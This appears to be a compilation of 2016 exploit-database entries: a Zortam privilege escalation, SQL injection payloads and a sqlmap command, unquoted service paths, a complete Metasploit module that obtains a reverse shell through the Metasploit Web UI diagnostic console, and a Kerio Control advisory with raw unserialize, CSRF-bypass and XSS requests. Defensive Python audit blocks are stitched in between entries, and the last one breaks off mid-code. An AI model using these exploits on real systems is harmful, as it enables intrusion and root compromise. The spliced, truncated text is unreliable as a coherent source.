# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions that grant any user full control of the executable. Because any local user can replace the binary, this allows code execution in the context of any other user who runs the application.
2. Proof
C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
3. Exploit:
Simply replace zmmspro.exe and wait for execution.
######################
# Application Name : Matrimonial Website Script v1.0.2
# Google Dork : inurl:viewfullprofile1.php?id=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://www.i-netsolution.com/
# Vulnerable Type : SQL Injection
# Date : 2016-09-22
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/viewfullprofile1.php
######################
# PoC Exploit:
http://localhost/[path]/viewfullprofile1.php?id=MM57711%20and%20%2F*%2130000if%28exists%28select%20concat%280x7233646D3076335F73716C5F696E6A656374696F6E%2Ccount%28*%29%29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD5%280x41%29%29%2C0%29*%2F
http://localhost/[path]/viewfullprofile1.php?id=MM57711%27%20AND%205860%3DIF%28%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29%3E1%29%2CSLEEP%285%29%2C5860%29%20AND%20%27wvYf%27%3D%27wvYf
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/viewfullprofile1.php?id=MM57711 --dbs
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=MM57711' AND 2424=2424 AND 'PgBT'='PgBT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=MM57711' AND SLEEP(5) AND 'AgXd'='AgXd
---
######################
# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.wisecleaner.com
# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Two separate instances of unquoted service path privilege escalation have been discovered. The first is in Wise Care 365 4.27, which installs a vulnerable service named WiseBootAssistant. The second exists when Wise Disk Cleaner 9.29 installs SpyHunter 4. Both of these services run with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
2. Proof
Wise Disk Cleaner 9.29
C:\>sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WiseBootAssistant
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wise\Wise Care 365\BootTime.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wise Boot Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
SpyHunter 4
C:\>sc qc "SpyHunter 4 Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyHunter 4 Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
LOAD_ORDER_GROUP : Base
TAG : 0
DISPLAY_NAME : SpyHunter 4 Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
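The two advisories above (the zmmspro.exe ACL and the WiseBootAssistant / SpyHunter 4 service paths) come down to two file-system conditions an administrator can check for in bulk. The following Python is an added example, not code from either advisory: it parses text in the shape of the `sc qc` and `cacls` output shown above (that text layout is an assumption drawn from the samples; `cacls` is deprecated in favour of `icacls`, so adapt the parser to whichever tool you run) and flags exactly the two conditions the advisories describe.

```python
"""Audit checks for the two Windows privilege escalation classes above:
unquoted service binary paths and program binaries that non-admin users
may overwrite. Added example, not from either advisory; the text layout
of `sc qc` and `cacls` output it parses is assumed from the samples."""
import re
from typing import Dict, List, Tuple

# Constructed `sc qc` output shaped like the WiseBootAssistant listing above.
SC_QC_SAMPLE = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WiseBootAssistant
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files\\Wise\\Wise Care 365\\BootTime.exe
        SERVICE_START_NAME : LocalSystem
"""

# Constructed `cacls` output shaped like the zmmspro.exe listing above.
CACLS_SAMPLE = """\
C:\\Program Files\\Zortam Mp3 Media Studio\\zmmspro.exe BUILTIN\\Users:F
                                                         NT AUTHORITY\\SYSTEM:(ID)F
                                                         BUILTIN\\Administrators:(ID)F
                                                         BUILTIN\\Users:(ID)R
"""

# Principals that mean "any local user". Full (F), change (C) or write (W)
# access for them on a binary that runs as someone else is the finding.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
WRITE_FLAGS = set("FCW")

# One cacls ACE: principal, optional "(ID)" inheritance marker, rights letters.
ACE_RE = re.compile(r"((?:NT AUTHORITY|BUILTIN|\S+)\\[\w .-]+?|Everyone):(\(ID\))?([A-Z]+)\b")


def service_path_candidates(binary_path: str) -> List[str]:
    """Paths the service control manager would try, in order, for an
    unquoted BINARY_PATH_NAME containing spaces: it splits at each space
    until a file exists. A quoted path, or one without spaces, yields a
    single candidate, which means there is nothing to fix. Every earlier
    candidate's directory must therefore not be writable by normal users."""
    path = binary_path.strip()
    if path.startswith('"') or " " not in path:
        return [path.strip('"')]
    m = re.match(r"(.*?\.exe)", path, re.IGNORECASE)  # drop trailing arguments
    exe = m.group(1) if m else path
    words = exe.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))] + [exe]


def audit_sc_qc(text: str) -> Dict[str, object]:
    """Flag a service whose unquoted path has more than one candidate and
    which runs as LocalSystem, so a hijacked candidate would run as SYSTEM."""
    name = re.search(r"SERVICE_NAME:\s*(\S.*)", text)
    path = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", text)
    account = re.search(r"SERVICE_START_NAME\s*:\s*(.+)", text)
    runs_as = account.group(1).strip() if account else None
    candidates = service_path_candidates(path.group(1)) if path else []
    return {
        "service": name.group(1).strip() if name else None,
        "runs_as": runs_as,
        "candidates": candidates,
        "vulnerable": len(candidates) > 1 and runs_as == "LocalSystem",
    }


def weak_acl_entries(cacls_text: str) -> List[Tuple[str, str]]:
    """Return (principal, rights) for every ACE that grants a low-privileged
    principal write-class rights on the file (file ACLs only; directory
    ACEs with (OI)/(CI) markers are not handled here)."""
    weak = []
    for m in ACE_RE.finditer(cacls_text):
        principal, rights = m.group(1), m.group(3)
        if principal in LOW_PRIV_PRINCIPALS and WRITE_FLAGS & set(rights):
            weak.append((principal, rights))
    return weak


if __name__ == "__main__":
    report = audit_sc_qc(SC_QC_SAMPLE)
    print(report["service"], "unquoted path, vulnerable:", report["vulnerable"])
    for c in report["candidates"]:
        print("  would try:", c)
    print("weak ACEs on zmmspro.exe:", weak_acl_entries(CACLS_SAMPLE))
```

Remediation follows directly from the two outputs: quote the service path (`sc config <name> binPath= "\"C:\...\BootTime.exe\""`) and remove the write-class ACE for BUILTIN\Users from the executable.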
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Metasploit Web UI Diagnostic Console Command Execution',
      'Description'    => %q{
        This module exploits the "diagnostic console" feature in the Metasploit
        Web UI to obtain a reverse shell.

        The diagnostic console is able to be enabled or disabled by an
        administrator on Metasploit Pro and by an authenticated user on
        Metasploit Express and Metasploit Community. When enabled, the
        diagnostic console provides access to msfconsole via the web interface.
        An authenticated user can then use the console to execute shell
        commands.

        NOTE: Valid credentials are required for this module.

        Tested against:
          Metasploit Community 4.1.0,
          Metasploit Community 4.8.2,
          Metasploit Community 4.12.0
      },
      'Author'         => [ 'Justin Steven' ], # @justinsteven
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Arch'           => ARCH_CMD,
      'Payload'        => { 'PayloadType' => 'cmd' },
      'Targets'        =>
        [
          [ 'Unix',
            {
              'Platform' => [ 'unix' ]
            }
          ],
          [ 'Windows',
            {
              'Platform' => [ 'windows' ]
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 23 2016'
    ))

    register_options(
      [
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptPort.new('RPORT', [ true, '', 3790 ]),
        OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]),
        OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
      ], self.class)
  end

  def do_login()
    print_status('Obtaining cookies and authenticity_token')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'login'),
    })

    unless res
      fail_with(Failure::NotFound, 'Failed to retrieve login page')
    end

    unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/
      fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?")
    end

    authenticity_token = $1
    session = res.get_cookies

    print_status('Logging in')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'user_sessions'),
      'cookie'    => session,
      'vars_post' =>
        {
          'utf8'                   => '\xE2\x9C\x93',
          'authenticity_token'     => authenticity_token,
          'user_session[username]' => datastore['USERNAME'],
          'user_session[password]' => datastore['PASSWORD'],
          'commit'                 => 'Sign in'
        }
    })

    unless res
      fail_with(Failure::NotFound, 'Failed to log in')
    end

    return res.get_cookies, authenticity_token
  end

  def get_console_status(session)
    print_status('Getting diagnostic console status and profile_id')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'settings'),
      'cookie' => session,
    })

    unless res
      fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')
    end

    unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/
      fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')
    end

    profile_id = $1

    if res.body =~ /<input\W+.*\b(id="allow_console_access"\W+.*\bchecked="checked"|checked="checked"\W+.*\bid="allow_console_access")/
      console_status = true
    elsif res.body =~ /<input\W+.*\bid="allow_console_access"/
      console_status = false
    else
      fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')
    end

    print_good("Console is currently: #{console_status ? 'Enabled' : 'Disabled'}")

    return console_status, profile_id
  end

  def set_console_status(session, authenticity_token, profile_id, new_console_status)
    print_status("#{new_console_status ? 'Enabling' : 'Disabling'} diagnostic console")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'settings', 'update_profile'),
      'cookie'    => session,
      'vars_post' =>
        {
          'utf8'                 => '\xE2\x9C\x93',
          '_method'              => 'patch',
          'authenticity_token'   => authenticity_token,
          'profile_id'           => profile_id,
          'allow_console_access' => new_console_status,
          'commit'               => 'Update Settings'
        }
    })

    unless res
      fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')
    end
  end

  def get_container_id(session, container_label)
    container_label_singular = container_label.gsub(/s$/, "")
    print_status("Getting ID of a valid #{container_label_singular}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, container_label),
      'cookie' => session,
    })

    unless res && res.body =~ /\bid="#{container_label_singular}_([^"]*)"/
      print_warning("Failed to get a valid #{container_label_singular} ID")
      return
    end

    container_id = $1
    vprint_good("Got: #{container_id}")
    container_id
  end

  def get_console(session, container_label, container_id)
    print_status('Creating a console, getting its ID and authenticity_token')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, container_label, container_id, 'console'),
      'cookie' => session,
    })

    unless res && res.headers['location']
      fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')
    end

    console_id = res.headers['location'].split('/')[-1]
    vprint_good("Got console ID: #{console_id}")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
      'cookie' => session,
    })

    unless res && res.body =~ /console_init\('console', 'console', '([^']*)'/
      fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')
    end

    console_authenticity_token = $1

    return console_id, console_authenticity_token
  end

  def run_command(session, container_label, console_authenticity_token, container_id, console_id, command)
    print_status('Running payload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
      'cookie'    => session,
      'vars_post' =>
        {
          'read'               => 'yes',
          'cmd'                => command,
          'authenticity_token' => console_authenticity_token,
          'last_event'         => '0',
          '_'                  => ''
        }
    })

    unless res
      fail_with(Failure::NotFound, 'Failed to run command')
    end
  end

  def exploit
    session, authenticity_token = do_login()

    original_console_status, profile_id = get_console_status(session)

    unless original_console_status
      set_console_status(session, authenticity_token, profile_id, true)
    end

    if container_id = get_container_id(session, "workspaces")
      # target calls them "workspaces"
      container_label = "workspaces"
    elsif container_id = get_container_id(session, "projects")
      # target calls them "projects"
      container_label = "projects"
    else
      fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')
    end

    console_id, console_authenticity_token = get_console(session, container_label, container_id)

    run_command(session, container_label, console_authenticity_token,
                container_id, console_id, payload.encoded)

    unless original_console_status
      set_console_status(session, authenticity_token, profile_id, false)
    end

    handler
  end
end
SEC Consult has also released a blog post describing the attack scenarios
of the vulnerabilities within this advisory in detail and a video which
shows the remote attack. Exploit code has been developed as well but will
not be released for now.
Blog:
http://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html
Video:
https://www.youtube.com/watch?v=y_OWz25sHMI
SEC Consult Vulnerability Lab Security Advisory < 20160922-0 >
=======================================================================
title: Potential backdoor access through multiple vulnerabilities
product: Kerio Control Unified Threat Management
vulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1 build 1324
fixed version: 9.1.3 (partially fixed, see vendor statement below)
CVE number: -
impact: critical
homepage: http://www.kerio.com/
found: 2016-08-24
by: R. Freingruber (Office Vienna)
R. Tavakoli (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Protect your network from viruses, malware and malicious activity
with Kerio Control, the easy-to-administer yet powerful all-in-one
security solution.
Kerio Control brings together next-generation firewall capabilities -
including a network firewall and router, intrusion detection and
prevention (IPS), gateway anti-virus, VPN, and web content and
application filtering. These comprehensive capabilities and unmatched
deployment flexibility make Kerio Control the ideal choice for small
and mid-sized businesses."
Source: http://www.kerio.com/products/kerio-control
Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory an attacker
can fully compromise a network which uses the Kerio Control appliance for
protection.
The attacker can trick a victim to visit a malicious website which then conducts
the internal attack. The attacked victim must be logged in or weak credentials
must be configured which can be found with a bruteforce attack.
The attacker will gain a reverse root shell from the Internet to the internal
Kerio Control firewall system. Moreover, it's possible that an internal attacker
uses the described vulnerabilities to escalate his privileges (low privileged
account to full root shell) to steal credentials from other users on the UTM
appliance.
Most vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found
in just two PHP scripts. Both scripts are not referenced by any other
PHP script nor by any binary on the system.
Both scripts contain a different(!), seemingly deliberate(?) CSRF bypass,
which makes the vulnerabilities exploitable from the Internet to obtain a
reverse root shell.
SEC Consult recommends not to use Kerio Control until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
to remote-code-execution
An authenticated user (standard user or administrator) can control data which
is later passed to unserialize. Kerio Control uses PHP 5.2.13, which was released
on 2010-02-25. This version is more than 6 years old, and several bugs have been
found in the unserialize function in the meantime. The following CVE numbers
are just some examples of vulnerabilities in unserialize which lead to remote
code execution:
-) CVE-2014-8142
-) CVE-2014-3515
-) CVE-2015-0231
-) CVE-2015-6834
-) CVE-2016-5771
-) CVE-2016-5773
PHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a
type confusion attack to trigger a use-after-free vulnerability. It can be used
to read data and get full code execution. In the case of Kerio Control the
result of unserialize is not reflected back to the attacker. It's therefore not
possible to read memory from the stack or heap (e.g. to bypass ASLR).
Nevertheless, SEC Consult developed a fully working and reliable (blind) exploit
for this vulnerability which spawns a reverse root shell to the Kerio Control
system.
For this exploit a user account is required. However, it's also possible to
conduct the attack via the Internet because the CSRF (Cross Site Request
Forgery) check can be bypassed (see below).
An attacker can use this vulnerability to break into a company network via the
Internet by tricking a logged in user to visit a malicious website. Even if the
user is currently not logged in the attacker can start a bruteforce attack to
obtain valid credentials to conduct the attack.
2) PHP script allows heap spraying
One of the PHP scripts allows the allocation of memory inside the main binary
(winroute) of Kerio Control. Winroute contains the code of most services
(e.g. the webserver, PHP, network related functionality, ...).
The memory will not be freed after finishing the request and can therefore be
used to spray payloads to the whole memory space.
This vulnerability was used in the overall exploit to defeat ASLR.
Please bear in mind that it's very likely that an attacker can write a working
exploit without heap spraying. Fixing this vulnerability would therefore not
prevent the exploitation of the remote code execution vulnerability.
For example, the information disclosure vulnerability from this advisory can
be used to bypass ASLR as well. This would eliminate the need of heap spraying.
3) CSRF Protection Bypass
The PHP scripts contain code to protect against CSRF (Cross Site Request
Forgery) attacks. Because of the wrong usage of PHP binary
operations and comparisons it's possible to bypass this check. That means
that an attacker can trigger requests from other websites which will be handled
by Kerio Control. This vulnerability allows to exploit the remote code
execution vulnerability from the Internet to break into a network.
4) Webserver running with root privileges
The main binary (which contains the webserver and PHP) runs with root
privileges.
Kerio told SEC Consult that this vulnerability will not be fixed. SEC
Consult strongly recommended otherwise.
5) Reflected Cross Site Scripting (XSS)
Kerio Control does not properly encode parameters which are reflected on the
website. This leads to cross site scripting vulnerabilities.
An attacker can abuse these vulnerabilities to modify the website or do actions
in the context of the attacked user.
6) Missing memory corruption protections
The main binary (winroute) is not compiled as a position-independent executable
(PIE). This allowed the use of ROP (return-oriented programming) code to
bypass the non-executable heap. Moreover, the stack is by default marked as
executable, but the exact location of the stack is randomized by ASLR.
7) Information Disclosure leads to ASLR bypass
One of the PHP scripts leaks pointers to the stack and heap.
This can be abused by attackers to bypass ASLR.
Because stacks are marked as executable an attacker can therefore easily bypass
ASLR and DEP/NX.
8) Remote Code Execution as administrator
Nearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code
execution vulnerability in the administrative web interface in the upgrade
functionality. This vulnerability is still unfixed, only the associated XSS
vulnerability was fixed. However, an attacker can still exploit it from the
Internet, e.g. by abusing the XSS vulnerability described in this advisory
(where the CSRF check can be bypassed).
With this vulnerability an attacker can gain a reverse root shell on
Kerio Control again if a logged in administrator visits a malicious website
on the Internet.
More information can also be found in the old advisory:
https://www.exploit-db.com/exploits/38450/
9) Login not protected against brute-force attacks
There are no bruteforce protections in place for the login.
If an unauthenticated victim visits an attacker's website, the attacker can
start a bruteforce attack to obtain valid credentials to execute the
remote code execution exploit. Via image-loading the attacker can detect if
the current credentials are valid (without violating SOP).
Proof of concept:
-----------------
1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
to remote-code-execution
The following request can be used to set the unserialize data. In this example
a faked string is used which points to 0xffffffff (kernel memory). Unserializing
it will therefore crash the remote webserver (the winroute process).
POST /set.php HTTP/1.1
Host: $IP:4081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 730
k_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:"k_dbName";s:5:"error";s:11:"k_dbSummara";s:3:"abc";s:14:"k_dbIndividual";s:3:"abc";s:16:"k_dbLastUsedType";s:3:"abc";s:10:"k_dbLayout";s:3:"abc";s:10:"k_pageType";s:3:"abc";s:13:"k_periodStart";i:123;s:11:"k_periodEnd";i:123;s:8:"k_userId";i:123;s:6:"tabBar";i:123;s:13:"k_gotoElement";i:123;s:9:"k_protoId";i:123;s:11:"k_errorType";i:123;s:16:"k_timezoneOffset";i:123;s:9:"k_groupId";i:123;s:2:"id";i:123;s:11:"k_dbSummary";C:16:"SplObjectStorage":152:{x:i:2;O:8:"stdClass":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:"\ff\ff\ff\ff\20\00\00\00\01\00\00\00\06\00\00";i:1;R:3;}}s:18:"k_historyTimestamp";s:3:"abc";}
The following request will call unserialize on the injected data:
GET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1
Host: $IP:4081
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
In the example above only a denial of service will be conducted. However, an
attacker can change the data type to object to get full code execution on
the remote system.
SEC Consult developed a fully working exploit for this attack which spawns a
root shell. Please note that this exploit was intentionally written to just
target Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets
are used which belong to the winroute binary with the SHA256 hash:
2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0
This exploit will not be released for now.
A real-world-attacker can detect the remote binary version by bruteforcing
the object handler related to CVE-2014-3515.
2) PHP script allows heap spraying
The set.php script contains the following code:
$p_variable = urldecode($_POST['k_variable']);
$p_value = urldecode($_POST['k_value']);
...
$p_session->setSessionVariable($p_variable, $p_value);
POST requests with the following parameters can therefore be used to allocate
space on the remote system:
k_securityHash=x&target=k_sessionVariable&k_variable=<random_name>
&k_value=<payload_to_allocate>
During tests it was possible to spray approximately 400 MB data in 30 seconds
which is enough to control two predictable addresses on the heap.
3) CSRF Protection Bypass
Two scripts are required for the remote code execution exploit:
-) set.php
-) ContentLoader.php
Both scripts contain different very interesting CSRF check bypasses.
The following code can be found in set.php:
$p_session->getCsrfToken(&$p_securityHash);
$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];
if ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) {
exit();
}
Since the programming language is PHP (and not JavaScript), the above code
does not work as expected. $p_postedHash can only become 0 or 1 because || is a
logical operator. The if-condition compares the valid token with the posted one
via the != operator; however, this will not check if the types are the same.
If k_securityHash is set (either via GET or POST) to any value, the above code
will compare the number 1 with a string, which will always bypass the check.
It's therefore enough to set k_securityHash to any value to bypass the CSRF
protection.
The following code can be found in contentLoader.php:
$p_session->getCsrfToken(&$p_securityHash);
$p_postedHash = $_GET['k_securityHash'];
...
if (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) {
$p_page = new p_Page();
$p_page->p_jsCode('window.top.location = "index.php";');
$p_page->p_showPageCode();
die();
}
Now the programmers only use the GET parameter, however, they changed the
logical operator in the if condition from || to && which means that the CSRF
check will only be applied if $p_postedHash is empty. It's therefore again
enough to set k_securityHash to any value to bypass the check.
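The two conditions above fail for different reasons (a boolean produced by `||` compared loosely in set.php, and `&&` short-circuiting in contentLoader.php), and the fix is the same for both. The Python below is an added example, not code from the advisory or from Kerio: it reimplements just enough of PHP 5's loose comparison rules (bool, null and string operands) to walk through both conditions with a constructed session token, and then shows the strict check the scripts should have used.

```python
"""Model of why the two Kerio CSRF checks quoted above accept any token.
Added example: a minimal Python model of PHP 5 truthiness, ||, and loose ==
for the operand types that occur here, plus the strict replacement check."""
import hmac
from typing import Dict, Union

PhpValue = Union[None, bool, str]
TOKEN = "2f9a1c7e0b4d"  # constructed session CSRF token ($p_securityHash)


def php_truthy(v: PhpValue) -> bool:
    """PHP boolean conversion: null, false, "" and "0" are false."""
    if v is None or v is False:
        return False
    if v is True:
        return True
    return v not in ("", "0")


def php_or(a: PhpValue, b: PhpValue) -> bool:
    """PHP's || always yields a bool, never one of its operands
    (unlike JavaScript's ||, which the set.php code seems to expect)."""
    return php_truthy(a) or php_truthy(b)


def php_loose_eq(a: PhpValue, b: PhpValue) -> bool:
    """PHP == for bool/null/string operands: a bool on either side makes the
    other side a bool; null compared with a string behaves like "".
    Numeric-string quirks are not needed for these tokens and are omitted."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_truthy(a) == php_truthy(b)
    return ("" if a is None else a) == ("" if b is None else b)


def set_php_accepts(get: Dict[str, str], post: Dict[str, str], real_token: str) -> bool:
    """set.php:  $p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];
                 if ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) exit();"""
    posted = php_or(get.get("k_securityHash"), post.get("k_securityHash"))
    rejected = php_loose_eq("", posted) or not php_loose_eq(posted, real_token)
    return not rejected


def content_loader_accepts(get: Dict[str, str], real_token: str) -> bool:
    """contentLoader.php (the !$p_session part of the condition omitted):
                 if ('' == $p_postedHash && $p_postedHash != $p_securityHash) die();"""
    posted = get.get("k_securityHash")
    rejected = php_loose_eq("", posted) and not php_loose_eq(posted, real_token)
    return not rejected


def strict_accepts(get: Dict[str, str], post: Dict[str, str], real_token: str) -> bool:
    """What both checks should do (in PHP: hash_equals() on the $_POST value):
    read the token from the request body only, require a non-empty string,
    and compare it with the session token in constant time."""
    posted = post.get("k_securityHash")
    if not isinstance(posted, str) or posted == "":
        return False
    return hmac.compare_digest(posted.encode(), real_token.encode())


if __name__ == "__main__":
    forged = {"k_securityHash": "x"}  # what a cross-site request can supply
    print("set.php accepts forged token:", set_php_accepts(forged, {}, TOKEN))
    print("contentLoader.php accepts forged token:", content_loader_accepts(forged, TOKEN))
    print("strict check accepts forged token:", strict_accepts(forged, forged, TOKEN))
```

Walking through set.php: `"x" || null` is `true`; `'' == true` is false because `''` becomes `false`; `true != "2f9a..."` is false because the non-empty token also becomes `true`. Neither half of the condition fires, so the request is accepted. The strict version has no such path: the `get` argument is ignored entirely, and the comparison is string-to-string.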
4) Webserver running with root privileges
No proof of concept necessary.
5) Reflected Cross Site Scripting (XSS)
In the following request the k_historyTimestamp parameter is prone to XSS:
https://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x
&k_historyTimestamp=aa%22;alert(1)%3b//
In the same request the id parameter can be used to inject JavaScript code.
Note that the attack can only be conducted against administrative users.
Users with standard privileges can only access pages with k_dbName set to one
of the following values:
-) accStats
-) prefs
-) dialup
-) error
In such a case Kerio Control adds code like the following
(in this example k_dbName=dialup):
var k_newDbName = "<kerio:text id="tabCaption_dialup"/>";
The " characters within the string are not correctly encoded.
This will lead to the termination of the JavaScript execution. Because the
injected payload is stored after this code, the attacker must bypass this
code to ensure that the payload gets executed. This is only possible if
the attacked user is an administrator because administrators can load any
dbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like
the following will be added instead (which does not crash):
var k_newDbName = "";
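The encoding failure described above (a raw `"` inside a server-generated JavaScript string literal) has a standard fix: emit the value as a JSON string literal rather than interpolating it. The Python below is an added example, not Kerio's code: it contrasts the naive interpolation with a JSON-encoded one, and uses a small scanner for double-quoted JS string literals to show what follows the literal in each case, using the two values the advisory mentions.

```python
"""Added example: generating `var k_newDbName = "...";` safely.
Neither the naive nor the safe emitter is from Kerio Control; the values
fed to them are taken from the advisory text above."""
import json


def naive_js_assignment(var: str, value: str) -> str:
    """Pattern the advisory describes: the value is pasted into the literal
    without encoding, so a '"' in it ends the string early."""
    return 'var %s = "%s";' % (var, value)


def safe_js_assignment(var: str, value: str) -> str:
    """json.dumps yields a valid JS string literal with '"' and '\\' escaped.
    Additionally escape '</' (so the literal cannot close a <script> element)
    and the U+2028/U+2029 line terminators, which older JS engines reject
    inside string literals even though JSON allows them."""
    literal = json.dumps(value)
    literal = literal.replace("</", "<\\/")
    literal = literal.replace("\u2028", "\\u2028").replace("\u2029", "\\u2029")
    return "var %s = %s;" % (var, literal)


def after_string_literal(js: str) -> str:
    """Scan the first double-quoted JS string literal in `js`, honouring
    backslash escapes, and return whatever follows its closing quote.
    For a correctly encoded assignment this is just ';'. Anything else
    means the value broke out of the literal and is parsed as code."""
    i = js.index('"') + 1
    while i < len(js):
        if js[i] == "\\":
            i += 2  # skip the escape and the escaped character
            continue
        if js[i] == '"':
            return js[i + 1:]
        i += 1
    raise ValueError("unterminated string literal")


# The two values the advisory discusses.
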